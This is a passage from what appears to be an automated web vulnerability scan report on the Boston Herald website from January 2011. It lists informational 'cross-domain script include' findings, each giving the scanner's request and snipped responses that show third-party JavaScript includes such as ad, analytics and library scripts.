Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.632. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.633. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.634. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.635. http://www.bostonherald.com/entertainment/music/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/music/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/music/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:12:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.636. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:11:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.637. http://www.bostonherald.com/entertainment/television/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/television/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/television/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:14:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.zap2it.com/tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=bostonher&zip=02118"></script>
...[SNIP]...
</style>

<script type="text/JavaScript" src="http://blog.zap2it.com/ithappenedlastnight/zap2it-editorial-widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.638. http://www.bostonherald.com/entertainment/travel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/travel/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/travel/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.639. http://www.bostonherald.com/extras/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /extras/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /extras/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

